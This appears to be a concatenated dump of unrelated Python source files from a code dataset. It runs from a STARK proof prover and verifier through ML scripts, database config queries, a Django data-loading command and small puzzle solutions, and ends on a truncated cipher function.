output_row_eval = [xs[i] - xs[(ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE - TRACE_SIZE + state_ind)*extension_factor] for i in range(precision)]
output_row_inv = f.multi_inv(output_row_eval)
constraints8_eval = [tmo * ori for (tmo, ori) in zip(trace_minus_output_eval, output_row_inv)]
constraints.append((8, constraints8_eval))
#This checks that p_mod_evals are actually computed properly
for state_ind in range(0, STATE_SIZE):
for poly_ind in range(0, STATE_SIZE):
filler_states = [once_state_eval[(i) % precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints9_eval = [f.mul(f.sub(p_evaluations_extension[(i + extension_factor*poly_ind) % precision] ,p_mod_eval[poly_ind][(i + state_ind*extension_factor) % precision]), filler_states_inv[i]) for i in range(precision)]
constraints.append((9, constraints9_eval))
#The last constraints check that the file_hash appears within the computational trace in the place it should appear in.
if file_hash is not None:
for state_ind in range(4, 8):
file_hash_row_eval = [xs[i] - xs[(ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE + BatchHeight*TRACE_SIZE*RAND_BEFORE + state_ind)*extension_factor] for i in range(precision)]
file_hash_row_inv = f.multi_inv(file_hash_row_eval)
constraints10_eval = [tmo * ori for (tmo, ori) in zip(trace_minus_file_hash_eval, file_hash_row_inv)]
constraints.append((10, constraints10_eval))
print("Computed all constraints polynomials")
#We create merkel trees for the p's and c's (trace polynomials and constraints polynomials)
p_eval_bytes = [x.to_bytes(8, 'big') for x in p_evaluations_extension]
p_mod_eval_bytes = [[x.to_bytes(8, 'big') for x in p_mod_i] for p_mod_i in p_mod_eval]
p_values_bytes = [p_eval_bytes[i] + b"".join([p[i] for p in p_mod_eval_bytes]) for i in range(precision)]
p_mtree = merkelize(p_values_bytes)
constraints_bytes = [[(x % modulus).to_bytes(8,'big') for x in constraint] for _, constraint in constraints]
constraints_concat_bytes = [b"".join([c[i] for c in constraints_bytes]) for i in range(precision)]
c_mtree = merkelize(constraints_concat_bytes)
print("Computed hash roots")
#We generate a linear combination of those polynomials, deg adjusted, with random constants
ks = []
for i in range(2*(len(constraints) + len(p_mod_eval)) + 2):
ks.append(int.from_bytes(blake(p_mtree[1] + i.to_bytes(2, 'big')), 'big') % modulus)
total_power = comp_length*6
#toatl_power - deg(constraint) for each constraint type
#We also add the total_power - def(p) or p_mod (which is comp_length) for them at the end
powers_list = [constraints_powers_dict[ind](total_power, comp_length) for ind, _ in constraints] + [total_power - comp_length for i in range(len(p_mod_eval) + 1)]
powers_eval = []
for power in powers_list:
G2_to_the_power = f.exp(G2, power)
tmp_powers = [1]
for i in range(1, precision):
tmp_powers.append(tmp_powers[-1]*G2_to_the_power % modulus)
powers_eval.append(tmp_powers)
l_evaluations = [0 for i in range(precision)]
#We add all the constraints, deg adjusted
for c_ind, (_, constraint) in enumerate(constraints):
#l += (k[2*c_ind] + k[2*c_ind + 1]*g**constraint_power) * constraint
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[c_ind*2], f.mul(ks[c_ind*2 + 1], powers_eval[c_ind][i])), constraint[i])) for i in range(precision)]
num_constraints = NUM_CONSTRAINTS
if file_hash is not None:
num_constraints += 4
assert num_constraints == len(constraints)
#We add all the p_mod values, deg adjusted
for p_ind, p_mod_i in enumerate(p_mod_eval):
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[2*num_constraints + p_ind*2], f.mul(ks[2*num_constraints + p_ind*2 + 1], powers_eval[num_constraints + p_ind][i])), p_mod_i[i])) for i in range(precision)]
#We add p_evaluations, deg adjusted
l_evaluations = [f.add(l_evaluations[i], f.mul(f.add(ks[-2], f.mul(ks[-1], powers_eval[-1][i])), p_evaluations_extension[i])) for i in range(precision)]
l_mtree = merkelize(l_evaluations)
print("Computed random linear combination")
# Do some spot checks of the Merkle tree at pseudo-random coordinates, excluding
# multiples of `extension_factor`
samples = spot_check_security_factor
positions = get_pseudorandom_indices(l_mtree[1], precision, samples,
exclude_multiples_of=extension_factor)
augmented_positions = sum([[(x - ((x // extension_factor) % TRACE_SIZE)* extension_factor + i*extension_factor) % precision for i in range(2*TRACE_SIZE)] for x in positions], [])
print('Computed %d spot checks' % samples)
# Return the Merkle roots of P and D, the spot check Merkle proofs,
# and low-degree proofs of P and D
low_degree_pf = prove_low_degree(l_evaluations, G2, total_power, modulus, exclude_multiples_of=extension_factor)
o = [p_mtree[1],
c_mtree[1],
l_mtree[1],
mk_multi_branch(p_mtree, augmented_positions),
mk_multi_branch(c_mtree, augmented_positions),
mk_multi_branch(l_mtree, augmented_positions),
low_degree_pf]
print("STARK computed in %.4f sec" % (time.time() - start_time))
assert verify_low_degree_proof(l_mtree[1], G2, low_degree_pf, total_power, modulus, exclude_multiples_of=extension_factor), "Couldn't verify low_degree pf"
return o
# Verifies a STARK
def rescue_verify(output, proof, file_hash = None, chain_length = 12, comp_length = 4096):
p_root, c_root, l_root, p_branches, c_branches, linear_comb_branches, fri_proof = proof
start_time = time.time()
if not is_a_power_of_2(comp_length):
return False
precision = comp_length * extension_factor
# Get (steps)th root of unity
G2 = f.exp(7, (modulus-1)//precision)
skips2 = comp_length // (BatchHeight * TRACE_SIZE)
skips3 = comp_length // TRACE_SIZE
total_power = comp_length * 6
if not verify_low_degree_proof(l_root, G2, fri_proof, total_power, modulus, exclude_multiples_of=extension_factor):
return False
print("Verified the random linear combination is low degree")
all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval = create_rescue_polynoms(precision, output, file_hash)
num_constraints = NUM_CONSTRAINTS
if file_hash is not None:
num_constraints += 4
powers = get_power_list(total_power, comp_length, file_hash is not None)
# Performs the spot checks
ks = []
for i in range(2*(num_constraints + TRACE_SIZE) + 2):
ks.append(int.from_bytes(blake(p_root + i.to_bytes(2, 'big')), 'big') % modulus)
samples = spot_check_security_factor
positions = get_pseudorandom_indices(l_root, precision, samples,
exclude_multiples_of=extension_factor)
augmented_positions = sum([[(x - ((x // extension_factor) % TRACE_SIZE)* extension_factor + i*extension_factor) % precision for i in range(2*TRACE_SIZE)] for x in positions], [])
p_branch_leaves = verify_multi_branch(p_root, augmented_positions, p_branches)
c_branch_leaves = verify_multi_branch(c_root, augmented_positions, c_branches)
linear_comb_branch_leaves = verify_multi_branch(l_root, augmented_positions, linear_comb_branches)
print("Verified Merkle branches")
for i, pos in enumerate(positions):
p_branches = [p_branch_leaves[i*(2*TRACE_SIZE) + j] for j in range(2*TRACE_SIZE)]
p_vals = []
p_mod_vals = [[] for j in range(TRACE_SIZE)]
for j in range(2*TRACE_SIZE):
p_vals.append(int.from_bytes(p_branches[j][:8], 'big'))
for k in range(TRACE_SIZE):
p_mod_vals[k].append(int.from_bytes(p_branches[j][8 + 8*k : 16 + 8*k], 'big'))
for pos_ind in range(TRACE_SIZE):
l_res = 0
pos = pos - ((pos // extension_factor) % TRACE_SIZE)*extension_factor + pos_ind * extension_factor
x = f.exp(G2, pos)
c_branch = c_branch_leaves[i*(2*TRACE_SIZE) + pos_ind]
#Calculate the values of all the polynomials
l_of_x = int.from_bytes(linear_comb_branch_leaves[i*(2*TRACE_SIZE) + pos_ind], 'big')
if not pos_ind == (pos // extension_factor) % TRACE_SIZE:
return False
c_vals = []
for j in range(0, len(c_branch)// 8):
c_vals.append(int.from_bytes(c_branch[8*j : 8 + 8*j], 'big'))
l_res += c_vals[-1] * (ks[j*2 + 0]+ ks[j*2 + 1] * f.exp(x, powers[j]))
state_after_eval = all_even_eval[pos]
for j in range(TRACE_SIZE):
state_after_eval = f.add(state_after_eval, f.mul(mds_eval[j][pos], f.exp(p_mod_vals[j][pos_ind], 3)))
state_before_eval = 0
for j in range(TRACE_SIZE):
subbed = f.sub(p_mod_vals[j][pos_ind + TRACE_SIZE], odd_consts_mod_eval[j][pos])
state_before_eval = f.add(state_before_eval, f.mul(inv_mds_eval[j][pos], subbed))
state_before_eval = f.exp(state_before_eval, 3)
#Validate the constraints:
const_ind = 0
const_type_ind = 0
for state_ind in range(STATE_SIZE, TRACE_SIZE):
filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(p_vals[pos_ind], filler_state):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(8, STATE_SIZE):
batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(p_vals[pos_ind], batch_ind0):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, STATE_SIZE):
batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(f.sub(f.add(p_vals[pos_ind], all_even_eval[pos]), state_before_eval), batch_ind0):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, 4):
batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
all_batches = f.mul(f.mul(batch_ind0, batch_ind30),batch_ind31)
filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(f.mul(f.sub(state_after_eval, state_before_eval), all_batches), filler_state):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(4, STATE_SIZE):
batch_ind0 = f.sub(f.exp(G2, skips2*(pos - 0 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind10 = f.sub(f.exp(G2, skips2*(pos - 10 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind20 = f.sub(f.exp(G2, skips2*(pos - 20 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
all_batches = f.mul(f.mul(f.mul(f.mul(batch_ind0, batch_ind10), batch_ind20), batch_ind30),batch_ind31)
filler_state = f.sub(f.exp(G2, skips3 * (pos - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(f.mul(f.sub(state_after_eval, state_before_eval), all_batches), filler_state):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(STATE_SIZE - 4, STATE_SIZE):
batch_ind10 = f.sub(f.exp(G2, skips2*(pos - 10 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
batch_ind20 = f.sub(f.exp(G2, skips2*(pos - 20 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
all_batches = f.mul(batch_ind10, batch_ind20)
if not c_vals[const_ind] == f.div(f.sub(state_before_eval, all_even_eval[pos]), all_batches):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, STATE_SIZE):
batch_ind30 = f.sub(f.exp(G2, skips2*(pos - 30 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind + TRACE_SIZE], state_after_eval), batch_ind30):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, 4):
batch_ind31 = f.sub(f.exp(G2, skips2*(pos - 31 * TRACE_SIZE * extension_factor - state_ind*extension_factor) % precision), 1)
last_step_eval = x - f.exp(G2, (comp_length - TRACE_SIZE + state_ind) *extension_factor)
if not c_vals[const_ind] == f.div(f.mul(f.sub(p_vals[pos_ind + TRACE_SIZE], p_vals[pos_ind]), last_step_eval), batch_ind31):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, len(output)):
output_row_eval = f.sub(x, f.exp(G2, (ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE - TRACE_SIZE + state_ind)*extension_factor))
if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind], output_eval[pos]), output_row_eval):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
const_type_ind += 1
for state_ind in range(0, STATE_SIZE):
for poly_ind in range(0, STATE_SIZE):
filler_state = f.sub(f.exp(G2, skips3 * (pos)), 1)
if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind + poly_ind], p_mod_vals[poly_ind][pos_ind + state_ind]), filler_state):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
if file_hash is not None:
const_type_ind += 1
for state_ind in range(4, 8):
file_hash_row_eval = f.sub(x, f.exp(G2, (ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE + BatchHeight*TRACE_SIZE*RAND_BEFORE + state_ind)*extension_factor))
if not c_vals[const_ind] == f.div(f.sub(p_vals[pos_ind], file_hash_eval[pos]), file_hash_row_eval):
print(f"Failed in Constraints {const_type_ind}")
return False
const_ind += 1
#We add all the p_mod values, deg adjusted
for p_ind, p_mod_i in enumerate(p_mod_vals):
l_res = f.add(l_res, f.mul(f.add(ks[2*num_constraints + p_ind*2], f.mul(ks[2*num_constraints + p_ind*2 + 1], f.exp(x, powers[num_constraints + p_ind]))), p_mod_i[pos_ind]))
#We add p_evaluations, deg adjusted
l_res = f.add(l_res, f.mul(f.add(ks[-2], f.mul(ks[-1], f.exp(x, powers[num_constraints + TRACE_SIZE]))), p_vals[pos_ind]))
# Check correctness of the linear combination
if not (l_of_x == l_res):
print("Linear combination is not correct")
return False
print('Verified %d consistency checks' % (TRACE_SIZE * spot_check_security_factor))
print('Verified STARK in %.4f sec' % (time.time() - start_time))
return True
|
21,976 | e9ba3e71fd45a0698b49e275066c761ed67d5fb9 | '''
Created on 2016年7月9日
@author: Shaow
'''
from numpy import *
import operator
from numpy.linalg.linalg import solve
from math import *
# from progressBar import *
import time
import sys
import measure
import samplingArchive
import os
from matplotlibPlot import *
from readFile import *
from knn import *
from measure import *
from poi import *
if __name__ == '__main__':
path = os.path.abspath(os.path.dirname(sys.argv[0]))
print('正在初始化参数...')
#2015-11(9:00-24:00) data input
testmat , testclassLabelVector = txt2data(path + '\\..\\data\\buffer.txt')
#testmat = autoNorm(testmat) 使用norm后正确率22%
returnmat , classLabelVector ,numofcheck = txt2dataNum(path + '\\..\\data\\poi-test.txt')
#returnmat , classLabelVector = txt2data(path + '\\..\\data\\8buffer.txt')
#returnmat = autoNorm(returnmat)
#save2txt('D:\\FILE\\PythonWorkspace\\machineLearning\\data\\', testmat, testclassLabelVector)
labels = txt2cata(path + '\\..\\data\\category.txt')
time.sleep(1)
print('矩阵初始化完成!')
pTSL = []
# bar = ProgressBar(total = 100)
# print('----------三秒后展示原坐标点图----------')
# barProcess(1,3)
#plotData(returnmat,classLabelVector , labels)
# print('原坐标图展示完成!')
num = len(testmat)
# print('----------K-NN计算进展情况----------')
k = 0; #可以正确显示目前的处理进度了
for i in range(len(testmat)):
if (i % int(len(testmat)/100) == 0):
print('done ')
print(k)
print('%')
k = k+1
# if(i%(int(len(testmat)/100))==0):
# bar.log('We have arrived at: ' + str(i + 1))
# bar.move()
pTSL.append(classifyByPoi(testmat[i] ,returnmat , classLabelVector ,numofcheck, 5))
#pTSL.append(classify(testmat[i] ,returnmat , classLabelVector , 11))
cR,pStatus = currentRate(pTSL , testclassLabelVector)
print('\n')
print('本次预测准确度为:',cR)
cT = countLabels(testclassLabelVector, labels)
pCT = countLabels(pTSL, labels)
f1score = []
fm = []
for j in range(len(labels)):
p,r,s,a = countTF(testclassLabelVector,pTSL,labels[j] , pCT[j],cT[j])
fm.append(fMeasure(r,a))
f1score.append(f1Score(p,r))
# print('----------三秒后展示预测坐标点图----------')
# barProcess(1,3)
plotData(testmat , pTSL , labels)
print('预测图展示完成!')
# print('----------三秒后展示预测情况图----------')
# barProcess(1,3)
plotData_2(testmat , pStatus)
print('情况图展示完成!')
|
21,977 | ea8ecd2213403ccafebd287a0cc1ccbf4b470cb2 | # Program: Algoritmo326_Enq64.py
# Author: Ramon R. Valeriano
# Description:
# Developed: 14/04/2020 - 20:11
# Updated:
cont_f = 0
cont_m = 0
higher_m = 0
supergirl = 0
sum_age = 0
while True:
age = int(input("Enter with your age: "))
if age <= 0 :
break
sex = input("Enter with your sex: ")
sex = sex.upper()
if sex == "FEMALE" and cont_f == 0:
smaller = age
experience = input("Enter if have experience/nY - Yes or N - Not: ")
experience = experience.upper()
if sex == "FEMALE":
cont_f+=1
if age <= 35 and experience == "Y":
supergirl+=1
if age < smaller:
smaller = age
elif sex == "MALE":
if experience == "Y":
cont_m+=1
sum_age+=age
if age >= 45:
higher_m+=1
else:
print("Invalid Option!")
media_age_m = sum_age/cont_m
conversion_m = (higher_m*cont_m)/100
print(cont_f)
print(media_age_m)
print(conversion_m)
print(smaller)
|
21,978 | 449314fdea43264145f935d483a24ffdf8b261d7 | # -*- coding: utf-8 -*-
# @Time : 2020/7/24 19:16
# @Author : wanglanqing
from business_modle.querytool import db
class VoyagerConfigs(object):
def __init__(self, db_env='testvoyager'):
self.db_env = db_env
def get_act_game_cfgs(self):
#查询养成活动的表信息
# sql1 = """use information_schema;"""
sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
information_schema.`TABLES` WHERE
`TABLE_SCHEMA` = 'voyager'
AND (`TABLE_NAME` LIKE '%cfg%'
or `TABLE_NAME` LIKE '%config%')
AND `TABLE_NAME` LIKE 'act_game%';"""
print self.db_env
# db.selectsqlnew(self.db_env, sql1)
re=db.selectsqlnew(self.db_env, sql2)
if re:
return db.selectsqlnew(self.db_env, sql2)
else:
return "没有查询到结果"
def get_other_cfgs(self):
#查询其他配置表信息
# sql1 = """use information_schema;"""
sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
information_schema.`TABLES` WHERE
`TABLE_SCHEMA` = 'voyager'
AND (`TABLE_NAME` LIKE '%cfg%' or `TABLE_NAME` LIKE '%config%')
AND `TABLE_NAME` not LIKE '%act_game%';"""
# db.selectsqlnew(self.db_env, sql1)
re=db.selectsqlnew(self.db_env, sql2)
if re:
return db.selectsqlnew(self.db_env, sql2)
else:
return "没有查询到结果"
def get_yijifen_cfgs(self):
#查询其他配置表信息
# sql1 = """use information_schema;"""
sql2 = """SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
information_schema.`TABLES` WHERE
`TABLE_SCHEMA` = 'yijifen'
AND (`TABLE_NAME` LIKE '%cfg%' or `TABLE_NAME` LIKE '%config%')
AND `TABLE_NAME` not LIKE '%pigs_%'
or `TABLE_NAME` = 'yjf_app_media';"""
# db.selectsqlnew(self.db_env, sql1)
re=db.selectsqlnew(self.db_env, sql2)
if re:
return db.selectsqlnew(self.db_env, sql2)
else:
return "没有查询到结果"
def get_pig_act_game_cfgs(self):
#查询养成活动的表信息
# sql1 = """use information_schema;"""
sql2 = """ SELECT TABLE_NAME '表名',TABLE_COMMENT '表备注' FROM
information_schema.`TABLES` WHERE
`TABLE_SCHEMA` = 'yijifen'
AND `TABLE_NAME` LIKE 'pig%';"""
print self.db_env
# db.selectsqlnew(self.db_env, sql1)
re=db.selectsqlnew(self.db_env, sql2)
if re:
return db.selectsqlnew(self.db_env, sql2)
else:
return "没有查询到结果"
def get_selected_table_cfg(self,selected_table, db_name):
sql = "select * from {}.{} order by create_time desc;".format(db_name, selected_table)
sql2= """select COLUMN_NAME '字段',COLUMN_TYPE '类型',COLUMN_COMMENT '备注' from information_schema.columns where table_schema = '{}'
and table_name = '{}' ;""".format(db_name, selected_table)
print sql,sql2
re1=db.selectsqlnew(self.db_env, sql)
re2=db.selectsqlnew(self.db_env,sql2)
if isinstance(re1,str):
return re1
elif isinstance(re1,tuple) and isinstance(re2,tuple):
return db.selectsqlnew(self.db_env, sql), db.selectsqlnew(self.db_env,sql2)
else:
return "没有查询到结果"
def get_pig_selected_table_cfg(self,selected_table):
sql = "select * from yijifen.{} order by id desc;".format(selected_table)
sql2= """select COLUMN_NAME '字段',COLUMN_TYPE '类型',COLUMN_COMMENT '备注' from information_schema.columns where table_schema = 'yijifen'
and table_name = '{}' ;""".format(selected_table)
print sql,sql2
re1=db.selectsqlnew(self.db_env, sql)
re2=db.selectsqlnew(self.db_env,sql2)
if isinstance(re1,str):
return re1
elif isinstance(re1,tuple) and isinstance(re2,tuple):
return db.selectsqlnew(self.db_env, sql), db.selectsqlnew(self.db_env,sql2)
else:
return "没有查询到结果"
if __name__ == '__main__':
vc = VoyagerConfigs(db_env='devvoyager')
print vc.get_selected_table_cfg('config_parameters_copy1') |
21,979 | 0a9e94be7767802acf66278f1ace78d31e412d88 | from django.core.management.base import NoArgsCommand
from optparse import make_option
import os
from django.conf import settings
class Command(NoArgsCommand):
help = "Load all taxonomy data into database"
requires_system_checks = True
def handle_noargs(self, **options):
localDir = os.path.dirname(__file__)
absDir = os.path.join(os.getcwd(), localDir)
verbose = options.get("verbose", True)
if verbose:
print "loading taxonomy, please wait, it can take a while..."
path_dumps = os.path.join( absDir,'..','..', 'dumps' )
db_name = settings.DATABASES["default"]["NAME"]
db_engine = settings.DATABASES["default"]["ENGINE"]
map_dumps = {}
# print os.listdir( path_dumps )
for dump in os.listdir( path_dumps ):
###########
if dump == '.svn': continue # XXX
name = os.path.splitext( dump )[0]
map_dumps[name] = os.path.join( path_dumps, dump )
if db_engine.endswith('sqlite3'):
cmd = "sqlite3 -separator '|' %s '.import %s server_%s'" % (
db_name, map_dumps[name], name)
elif db_engine.endswith('mysql'):
cmd = """mysql --local-infile -h %s -u %s -p%s %s -e "SET FOREIGN_KEY_CHECKS=0; LOAD DATA LOCAL INFILE '%s' INTO TABLE djangophylocore_%s FIELDS TERMINATED BY '|';" """ % (
settings.DATABASES["default"]["HOST"], settings.DATABASES["default"]["USER"], settings.DATABASES["default"]["PASSWORD"], db_name, map_dumps[name], name )
elif db_engine.endswith('psycopg2'):
cmd = """psql -h %s -U %s -d %s -c "ALTER TABLE djangophylocore_%s DISABLE TRIGGER ALL; COPY djangophylocore_%s FROM '%s' WITH DELIMITER AS '|'; ALTER TABLE djangophylocore_%s ENABLE TRIGGER ALL; " """ % (
settings.DATABASES["default"]["HOST"],settings.DATABASES["default"]["USER"], db_name, name, name, map_dumps[name], name)
if verbose:
print cmd
os.system( cmd )
# if not os.path.exists(
# os.path.join( path_dumps, 'parentsrelation.dmp' ) ):
# if verbose:
# print "no parent relations found, generating..."
# os.system( 'python manage.py generateparents' )
|
21,980 | e46245e637ca87a4b32f41b13c5e13654cf0d0c7 |
from .nodeutils import NodeUtils
from neomodel import (
StringProperty,
StructuredNode,
RelationshipTo,
RelationshipFrom,
Relationship
)
class Protein(StructuredNode, NodeUtils):
uniprotid = StringProperty()
# drugs = RelationshipFrom('.drug.Drug', 'TARGETS')
go = RelationshipTo('.go.GO', 'HAS_ANNOTATION')
@property
def serialize(self):
return {
'node_properties': {
'uniprotid': self.uniprotid,
'id': self.id,
},
}
@property
def serialize_connections(self):
# Define all the relationships that a node has with the other
# nodes in the database.
return [
{
'nodes_type':'GO',
'nodes_related': self.serialize_relationships(self.go.all()),
},
]
|
21,981 | 9cbdad9ef634afe4a26b098b1bcac0d9232bd685 | import pathlib
from collections import Counter
def get_input():
root_path = pathlib.Path(__file__).parent.absolute()
with open(f"{root_path}/input.txt", "r") as input_file:
input_raw = input_file.readlines()
return [line.strip() for line in input_raw]
def get_most_common_bit(input_data, index):
index_data = [bits[index] for bits in input_data]
index_string = "".join(index_data)
bits_counter = Counter(index_string)
return bits_counter.most_common(1)[0][0]
def get_least_common_bit(input_data, index):
index_data = [bits[index] for bits in input_data]
index_string = "".join(index_data)
bits_counter = Counter(index_string)
return bits_counter.most_common()[-1][0]
def get_answer_part_1(input_data):
num_bits = len(input_data[0])
gamma_rate_binary = ""
for i in range(num_bits):
gamma_rate_binary += get_most_common_bit(input_data, i)
gamma_rate = int(gamma_rate_binary, 2)
epsilon_rate_binary = ""
for i in range(num_bits):
epsilon_rate_binary += get_least_common_bit(input_data, i)
epsilon_rate = int(epsilon_rate_binary, 2)
return gamma_rate * epsilon_rate
def get_answer_part_2(input_data):
pass
def main():
input_data = get_input()
answer1 = get_answer_part_1(input_data)
answer2 = get_answer_part_2(input_data)
print(f"Part 1 answer: {answer1}")
print(f"Part 2 answer: {answer2}")
if __name__ == "__main__":
main()
|
21,982 | 494c63ef2bf76499ef209827ab4912f7b4e486b3 | import string
def universe(arr,damage):
#print(arr)
swap = 0
d1 = calDamage(arr)
while d1 > damage:
rev = arr[::-1]
if rev.find('SC') != -1:
i = rev.find('SC')
rev = rev[:i]+'CS'+rev[i+2:]
swap += 1
else:
swap = -1
break
arr = rev[::-1]
d1 = calDamage(arr)
print(d1,swap,arr)
return swap
def calDamage(arr):
beam = 1
d = 0
for i in range(len(arr)):
if arr[i] == 'S':
d += beam
else:
beam = beam*2
return d
if __name__ == '__main__':
t = int(input())
for k in range(t):
d,ar = input().split()
d = int(d)
res = universe(ar,d)
string = 'Case #'+str(k+1)+': '
if res == -1:
string = string + 'IMPOSSIBLE'
else:
string = string + str(res)
print(string)
|
21,983 | 9a07510ff0baccc90ad3e2af58e7938564a13ec2 | import unittest
from count_letters import count_letters
class TestCountLetters(unittest.TestCase):
def test_count_empty_string(self):
self.assertEqual(count_letters(""), {})
def test_count_letters_single_string(self):
self.assertEqual(count_letters("alma"), {'a': 2, 'l': 1, 'm': 1})
def test_count_string_with_spaces(self):
self.assertEqual(count_letters("cats and cats"), {'c': 2, 'a': 3, 't': 2, "s": 2, "n": 1, "d": 1})
if __name__ == '__main__':
unittest.main()
|
21,984 | 1594e9bf9dc3fea3b343ee13a57e9754dc793dab | import requests
def url_ok(url):
r = requests.head(url)
return r.status_code == 200
url ="https://www.thinklabs.com/"
print(url_ok(url))
|
21,985 | f74abfd2bc9a19cddd9538ca20cf772de725cb6b | # -*- coding: utf-8 -*-
"""
Functions for parsing MatlabLexer output.
:copyright: Copyright 2023 Jørgen Cederberg
:license: BSD, see LICENSE for details.
"""
import re
import sphinx.util
logger = sphinx.util.logging.getLogger("matlab-domain")
def remove_comment_header(code):
"""
Removes the comment header (if there is one) and empty lines from the
top of the current read code.
:param code: Current code string.
:type code: str
:returns: Code string without comments above a function, class or
procedure/script.
"""
# get the line number when the comment header ends (incl. empty lines)
ln_pos = 0
for line in code.splitlines(True):
if re.match(r"[ \t]*(%|\n)", line):
ln_pos += 1
else:
break
if ln_pos > 0:
# remove the header block and empty lines from the top of the code
try:
code = code.split("\n", ln_pos)[ln_pos:][0]
except IndexError:
# only header and empty lines.
code = ""
return code
def remove_line_continuations(code):
"""
Removes line continuations (...) from code as functions must be on a
single line
:param code:
:type code: str
:return:
"""
# pat = r"('.*)(\.\.\.)(.*')"
# code = re.sub(pat, r"\g<1>\g<3>", code, flags=re.MULTILINE)
pat = r"^([^%'\"\n]*)(\.\.\..*\n)"
code = re.sub(pat, r"\g<1>", code, flags=re.MULTILINE)
return code
def fix_function_signatures(code):
"""
Transforms function signatures with line continuations to a function
on a single line with () appended. Required because pygments cannot
handle this situation correctly.
:param code:
:type code: str
:return: Code string with functions on single line
"""
pat = r"""^[ \t]*function[ \t.\n]* # keyword (function)
(\[?[\w, \t.\n]*\]?) # outputs: group(1)
[ \t.\n]*=[ \t.\n]* # punctuation (eq)
(\w+)[ \t.\n]* # name: group(2)
\(?([\w, \t.\n]*)\)?""" # args: group(3)
pat = re.compile(pat, re.X | re.MULTILINE) # search start of every line
# replacement function
def repl(m):
retv = m.group(0)
# if no args and doesn't end with parentheses, append "()"
if not (m.group(3) or m.group(0).endswith("()")):
retv = retv.replace(m.group(2), m.group(2) + "()")
return retv
code = pat.sub(repl, code) # search for functions and apply replacement
return code
|
21,986 | 34d6f7fe545c9c636ce3bc7e8df4e157acf39bc8 | if __name__ == '__main__':
import argparse
from paqc.driver import driver
# define command line parser
parser = argparse.ArgumentParser(prog='paqc', description='Data QC package '
'of the Predictive Analytics team.')
# add arguments
parser.add_argument('config_path', type=str, action='store',
help="Path to config YAML file.")
parser.add_argument('--debug', action='store_true', help="Useful for devs.")
parser.add_argument('--silent', action='store_false',
help="Controls verbosity. Use it if you want paqc to"
"run with less messages.")
# parse input parameters
args = parser.parse_args()
# execute PAQC pipeline
d = driver.Driver(args.config_path, verbose=args.silent, debug=args.debug)
d.run()
|
21,987 | 40c87e5f8bfe533dec5569f25e6d3f369beb10b8 | from project.tools.connect_db import *
def main():
select_cidade(create_connection("D:\\sqlite\db\pythonsqlite.db"), "Serra Negra do Norte - RN")
if __name__ == '__main__':
main() |
21,988 | 34f37bf7c67c845b383d64d9fe679afa17783b5e | import json
f = open('28_2018_jad_data.json', 'r')
for line in f:
tweets= json.loads(line)
if tweets.has_key('extended_tweet'):
print "TEXT"
print tweets['text']
print '\r'
print "EXTENDED"
print tweets['extended_tweet']['full_text']
print '\n'
else:
print "ONLY SHORT TEXT"
print tweets['text']
print '\n'
|
21,989 | 578f9bef150a7052d2557486c5a0e100eefa8db6 | import re
def encryption(S, n):
alphabet = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'
newString = ""
for letter in S:
if letter != ' ':
